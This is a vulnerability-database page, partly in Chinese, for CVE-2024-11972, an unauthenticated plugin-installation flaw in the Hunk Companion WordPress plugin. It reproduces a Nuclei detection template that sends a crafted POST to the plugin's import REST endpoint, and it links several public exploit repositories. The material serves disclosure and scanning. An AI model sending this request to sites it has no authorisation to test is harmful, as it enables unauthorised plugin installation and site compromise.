CVE-2024-11972: Hunk Companion < 1.9.0 - Unauthenticated Plugin Installation

日期: 2025-08-01 | 影响软件: Hunk Companion | POC: 已公开

漏洞描述

The plugin does not correctly authorize some REST API endpoints, allowing unauthenticated requests to install and activate arbitrary plugins from the WordPress.org repo, including vulnerable plugins that have been closed.

PoC代码[已公开]

id: CVE-2024-11972

info:
  name: Hunk Companion < 1.9.0 - Unauthenticated Plugin Installation
  author: s4e-io
  severity: critical
  description: |
    The plugin does not correctly authorize some REST API endpoints, allowing unauthenticated requests to install and activate arbitrary plugins from the WordPress.org repo, including vulnerable plugins that have been closed.
  reference:
    - https://wpscan.com/vulnerability/4963560b-e4ae-451d-8f94-482779c415e4/
    - https://github.com/JunTakemura/exploit-CVE-2024-11972
    - https://github.com/Nxploited/CVE-2024-11972-PoC
    - https://github.com/RonF98/CVE-2024-11972-POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-11972
    epss-score: 0.91001
    epss-percentile: 0.99624
    cpe: cpe:2.3:a:themehunk:hunk_companion:*:*:*:*:*:wordpress:*:*
  metadata:
    vendor: themehunk
    product: hunk_companion
    framework: wordpress
    fofa-query: body="/wp-content/plugins/hunk-companion/"
  tags: cve,cve-2024,wordpress,wp,wp-plugin,hunk-companion,vkev

variables:
  plugin: "{{to_lower(rand_text_alpha(6))}}"
  x-wp-nonce: "{{to_lower(rand_text_alpha(12))}}"

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /wp-json/hc/v1/themehunk-import HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"params":{"templateType":"free","plugin":{"{{plugin}}": "{{plugin}}"},"allPlugins":[{"{{plugin}}": "{{plugin}}/{{plugin}}.php"}]},"headers":{"X-WP-Nonce":"{{x-wp-nonce}}"}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - '"\"https:\\\/\\\/'

      - type: word
        part: content_type_2
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100e474412ab46ac022ef0fd1e6bc916b47c4b1d6271c53188b26c7d0e413ac898902204707093119879bf4fa00d99c34060a0a0c1822f8e913d646b8a4c272bb9f97fa:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-11972.yaml

相关漏洞推荐